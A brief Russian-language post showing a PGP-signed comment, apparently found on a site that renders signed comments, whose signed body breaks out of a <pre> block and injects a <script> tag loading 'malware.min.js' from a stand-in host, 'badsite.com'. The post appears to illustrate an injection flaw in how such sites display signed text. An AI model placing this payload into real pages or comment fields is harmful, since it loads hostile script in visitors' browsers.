Дилемма

Нашёл на одном сайте, который "понимает" подписанные gpg коммментарии.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

</pre>
<script src="http://badsite.com/js/malware.min.js" type="text/javascript"></script>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

<skipped base64 block>
-----END PGP SIGNATURE-----